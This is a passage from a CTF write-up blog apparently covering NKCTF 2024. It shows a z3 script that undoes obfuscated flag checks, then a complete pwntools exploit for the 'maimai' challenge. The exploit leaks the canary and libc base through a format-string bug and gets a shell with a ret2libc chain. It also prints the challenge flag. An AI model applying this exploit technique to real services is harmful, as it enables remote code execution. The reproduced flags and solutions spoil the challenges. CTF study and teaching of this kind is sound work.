flag[21] = -105 * (39 * (2 * (flag[8] & (-105 * (39 * (2 * (flag[21] & flag[6]) + (flag[21] ^ flag[6])) + 23) + 111)) + (flag[8] ^ (-105 * (39 * (2 * (flag[21] & flag[6]) + (flag[21] ^ flag[6])) + 23) + 111))) + 23) + 111
flag[22] = -105 * (39 * (2 * (flag[5] & flag[22]) + (flag[5] ^ flag[22])) + 23) + 111
flag[23] = -105 * (39 * (2 * ((flag[0] ^ flag[2]) & flag[23]) + (flag[0] ^ flag[2] ^ flag[23])) + 23) + 111
flag[24] = -105 * (39 * (2 * (flag[24] & (-105 * (39 * (2 * (flag[1] & 0x18) + (flag[1] ^ 0x18)) + 23) + 111)) + (flag[24] ^ (-105 * (39 * (2 * (flag[1] & 0x18) + (flag[1] ^ 0x18)) + 23) + 111))) + 23) + 111

然后用Ponce直接符号化运行,断点下在最后While循环里面那个判断的地方

解出约束如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
"""
- SymVar_1: 0xe1
- SymVar_2: 0x77 (w)
- SymVar_3: 0x15
- SymVar_4: 0x9c
- SymVar_5: 0x28 (()
- SymVar_6: 0x8c
- SymVar_7: 0x11
- SymVar_8: 0x4e (N)
- SymVar_9: 0x9c
- SymVar_10: 0x93
- SymVar_11: 0x31 (1)
- SymVar_12: 0xf0
- SymVar_13: 0x43 (C)
- SymVar_14: 0x45 (E)
- SymVar_15: 0x1f
- SymVar_16: 0x17
- SymVar_17: 0x98
- SymVar_18: 0xb8
- SymVar_19: 0x14
- SymVar_20: 0xa3
- SymVar_21: 0x63 (c)
- SymVar_22: 0x26 (&)
- SymVar_23: 0xf4
- SymVar_24: 0x5c (\)
- SymVar_25: 0xc
"""

再配合前面的运算z3解出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
from z3 import *

enc = [0xe1, 0x77, 0x15, 0x9c, 0x28, 0x8c, 0x11, 0x4e, 0x9c, 0x93, 0x31, 0xf0, 0x43, 0x45, 0x1f, 0x17, 0x98, 0xb8, 0x14,
0xa3, 0x63, 0x26, 0xf4, 0x5c, 0xc]

flag = [BitVec('flag_%d' % (i),8)for i in range(25)]
s = Solver()

flag[0] = -105 * (39 * (2 * (flag[0] & (-105 * (39 * (2 * (flag[11] & (-105 * (39 * (2 * (flag[10] & 3) + (flag[10] ^ 3)) + 23) + 111)) + (flag[11] ^ (-105 * (39 * (2 * (flag[10] & 3) + (flag[10] ^ 3)) + 23) + 111))) + 23) + 111)) + (flag[0] ^ (-105 * (39 * (2 * (flag[11] & (-105 * (39 * (2 * (flag[10] & 3) + (flag[10] ^ 3)) + 23) + 111)) + (flag[11] ^ (-105 * (39 * (2 * (flag[10] & 3) + (flag[10] ^ 3)) + 23) + 111))) + 23) + 111))) + 23) + 111
flag[1] = -105 * (39 * (2 * ((flag[13] ^ flag[14]) & flag[1]) + (flag[13] ^ flag[14] ^ flag[1])) + 23) + 111
flag[2] = -105 * (39 * (2 * (flag[2] & (-105 * (39 * (2 * (flag[14] & flag[15]) + (flag[14] ^ flag[15])) + 23) + 111)) + (flag[2] ^ (-105 * (39 * (2 * (flag[14] & flag[15]) + (flag[14] ^ flag[15])) + 23) + 111))) + 23) + 111
flag[3] = -105 * (39 * (2 * ((flag[17] ^ 0x17) & flag[3]) + (flag[17] ^ 0x17 ^ flag[3])) + 23) + 111
flag[4] = -105 * (39 * (2 * (flag[4] & (-105 * (39 * (2 * (flag[20] & (-105 * (39 * (2 * (flag[9] & 0xFB) + (flag[9] ^ 0xFB)) + 23) + 111)) + (flag[20] ^ (-105 * (39 * (2 * (flag[9] & 0xFB) + (flag[9] ^ 0xFB)) + 23) + 111))) + 23) + 111)) + (flag[4] ^ (-105 * (39 * (2 * (flag[20] & (-105 * (39 * (2 * (flag[9] & 0xFB) + (flag[9] ^ 0xFB)) + 23) + 111)) + (flag[20] ^ (-105 * (39 * (2 * (flag[9] & 0xFB) + (flag[9] ^ 0xFB)) + 23) + 111))) + 23) + 111))) + 23) + 111
flag[5] = -105 * (39 * (2 * (flag[5] & (~flag[23] + flag[21] + 1)) + (flag[5] ^ (~flag[23] + flag[21] + 1))) + 23) + 111
flag[6] = -105 * (39 * (2 * (flag[6] & (-105 * (39 * (2 * (flag[8] & flag[7]) + (flag[8] ^ flag[7])) + 23) + 111)) + (flag[6] ^ (-105 * (39 * (2 * (flag[8] & flag[7]) + (flag[8] ^ flag[7])) + 23) + 111))) + 23) + 111
flag[7] = -105 * (39 * (2 * (flag[7] & (-105 * (39 * (2 * ((~flag[20] + flag[23] + 1) & 0x11) + ((~flag[20] + flag[23] + 1) ^ 0x11)) + 23) + 111)) + (flag[7] ^ (-105 * (39 * (2 * ((~flag[20] + flag[23] + 1) & 0x11) + ((~flag[20] + flag[23] + 1) ^ 0x11)) + 23) + 111))) + 23) + 111
flag[8] = -105 * (39 * (2 * (flag[8] & (flag[19] ^ (-105 * (39 * (2 * (flag[18] & 1) + (flag[18] ^ 1)) + 23) + 111))) + (flag[8] ^ flag[19] ^ (-105 * (39 * (2 * (flag[18] & 1) + (flag[18] ^ 1)) + 23) + 111))) + 23) + 111
flag[9] = ~flag[16] + -105 * (39 * (2 * (flag[17] & flag[9]) + (flag[17] ^ flag[9])) + 23) + 111 + 1
flag[10] = -105 * (39 * (2 * (flag[10] & (-105 * (39 * (2 * (flag[14] & flag[15]) + (flag[14] ^ flag[15])) + 23) + 111)) + (flag[10] ^ (-105 * (39 * (2 * (flag[14] & flag[15]) + (flag[14] ^ flag[15])) + 23) + 111))) + 23) + 111
flag[11] = -105 * (39 * (2 * (flag[12] & (-105 * (39 * (2 * (flag[13] & (-105 * (39 * (2 * (flag[11] & 0xF9) + (flag[11] ^ 0xF9)) + 23) + 111)) + (flag[13] ^ (-105 * (39 * (2 * (flag[11] & 0xF9) + (flag[11] ^ 0xF9)) + 23) + 111))) + 23) + 111)) + (flag[12] ^ (-105 * (39 * (2 * (flag[13] & (-105 * (39 * (2 * (flag[11] & 0xF9) + (flag[11] ^ 0xF9)) + 23) + 111)) + (flag[13] ^ (-105 * (39 * (2 * (flag[11] & 0xF9) + (flag[11] ^ 0xF9)) + 23) + 111))) + 23) + 111))) + 23) + 111
flag[12] = -105 * (39 * (2 * (flag[12] & flag[11]) + (flag[12] ^ flag[11])) + 23) + 111
flag[13] = -105 * (39 * (2 * (flag[13] & (flag[7] ^ flag[8])) + (flag[13] ^ flag[7] ^ flag[8])) + 23) + 111
flag[14] = -105 * (39 * (2 * (flag[5] & (-105 * (39 * (2 * (flag[4] & (-105 * (39 * (2 * (flag[14] & 0xC) + (flag[14] ^ 0xC)) + 23) + 111)) + (flag[4] ^ (-105 * (39 * (2 * (flag[14] & 0xC) + (flag[14] ^ 0xC)) + 23) + 111))) + 23) + 111)) + (flag[5] ^ (-105 * (39 * (2 * (flag[4] & (-105 * (39 * (2 * (flag[14] & 0xC) + (flag[14] ^ 0xC)) + 23) + 111)) + (flag[4] ^ (-105 * (39 * (2 * (flag[14] & 0xC) + (flag[14] ^ 0xC)) + 23) + 111))) + 23) + 111))) + 23) + 111
flag[15] = -105 * (39 * (2 * (flag[3] & (-105 * (39 * (2 * (flag[15] & 8) + (flag[15] ^ 8)) + 23) + 111)) + (flag[3] ^ (-105 * (39 * (2 * (flag[15] & 8) + (flag[15] ^ 8)) + 23) + 111))) + 23) + 111
flag[16] = -105 * (39 * (2 * ((flag[2] ^ 0x4D) & flag[16]) + (flag[2] ^ 0x4D ^ flag[16])) + 23) + 111
flag[17] = -105 * (39 * (2 * (flag[17] & (-105 * (39 * (2 * ((flag[1] ^ 0x17) & 0xF9) + (flag[1] ^ 0xEE)) + 23) + 111)) + (flag[17] ^ (-105 * (39 * (2 * ((flag[1] ^ 0x17) & 0xF9) + (flag[1] ^ 0xEE)) + 23) + 111))) + 23) + 111
flag[18] = -105 * (39 * (2 * ((flag[17] ^ flag[15]) & flag[18]) + (flag[17] ^ flag[15] ^ flag[18])) + 23) + 111
flag[19] = -105 * (39 * (2 * (flag[12] & (-105 * (39 * (2 * (flag[14] & flag[19]) + (flag[14] ^ flag[19])) + 23) + 111)) + (flag[12] ^ (-105 * (39 * (2 * (flag[14] & flag[19]) + (flag[14] ^ flag[19])) + 23) + 111))) + 23) + 111
flag[20] = -105 * (39 * (2 * (flag[20] & flag[11]) + (flag[20] ^ flag[11])) + 23) + 111
flag[21] = -105 * (39 * (2 * (flag[8] & (-105 * (39 * (2 * (flag[21] & flag[6]) + (flag[21] ^ flag[6])) + 23) + 111)) + (flag[8] ^ (-105 * (39 * (2 * (flag[21] & flag[6]) + (flag[21] ^ flag[6])) + 23) + 111))) + 23) + 111
flag[22] = -105 * (39 * (2 * (flag[5] & flag[22]) + (flag[5] ^ flag[22])) + 23) + 111
flag[23] = -105 * (39 * (2 * ((flag[0] ^ flag[2]) & flag[23]) + (flag[0] ^ flag[2] ^ flag[23])) + 23) + 111
flag[24] = -105 * (39 * (2 * (flag[24] & (-105 * (39 * (2 * (flag[1] & 0x18) + (flag[1] ^ 0x18)) + 23) + 111)) + (flag[24] ^ (-105 * (39 * (2 * (flag[1] & 0x18) + (flag[1] ^ 0x18)) + 23) + 111))) + 23) + 111

for i in range(25):
s.add(flag[i] == enc[i])

s.check()
m = s.model()

flag = [BitVec('flag_%d' % (i),8)for i in range(25)]

for i in flag:
print(chr(m[i].as_long()), end='')

#NKCTF{THut_1Ss_s@_eAsyhh}

NKCTF - maimai

格式化字符串+栈溢出漏洞,挺入门的一个题目,对我这个pwn新手友好.

大体思路就是通过格式化字符串漏洞泄漏cannarye和栈上的一个libc地址,然后计算偏移得到libc基地址,然后就是常规ret2libc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
from pwn import *
from pwn import p32,u32,p64,u64,p8

context.terminal = ['tmux','splitw','-h']
# context.log_level = "debug"
r = process("./1")
# r = gdb.debug("./1","b *$rebase(0x19E9)")
elf = ELF("./1")
libc = ELF("./libc.so.6")
put_plt = elf.plt['puts']
pus_got = elf.got['puts']
cannary = 0
__libc_start_call_main = 0
libc_base = 0

def add():
r.recvuntil(b"Select a option:")
r.sendline(b"1")
r.recvuntil(b"Input chart level and rank.")
for i in range(49):
r.sendline(b"0.0 0")
r.sendline(b"1550.0 SSS+")

def com_cannary():
global cannary
r.recvuntil(b"Select a option:")
r.sendline(b"2")
r.recvuntil(b"Input your nickname.")
r.sendline(b"%7$p")
r.recvuntil(b"0x")
cannary = int(r.recvline(16),base=16)
r.recvuntil(b"Can you teach me how to play maimai?")
# payload = b"a"*40 + p64(cannary)
r.sendline('1')

def com_base():
global __libc_start_call_main
r.recvuntil(b"Select a option:")
r.sendline(b"2")
r.recvuntil(b"Input your nickname.")
r.sendline(b"%13$p")
r.recvuntil(b"0x")
__libc_start_call_main = int(r.recvline(16),base=16)
# print(hex(__libc_start_call_main))


def exploit():
global libc_base
libc_base = __libc_start_call_main - 171408
pop_rdi = libc_base + 0x2a3e5
bin_sh = libc_base + next(libc.search("/bin/sh\x00"))
system = libc_base + libc.sym['system']
ret = libc_base + 0x29139
r.recvuntil(b"Can you teach me how to play maimai?")
payload = b"a"*40 + p64(cannary) + b'a'*8 + p64(pop_rdi) + p64(bin_sh) +p64(ret) + p64(system)
r.sendline(payload)


add()
com_cannary()
com_base()
exploit()

r.interactive()



AliyunCTF & NKCTF
http://example.com/2024/03/24/Ali_NK/
Author
yring
Posted on
March 24, 2024
Licensed under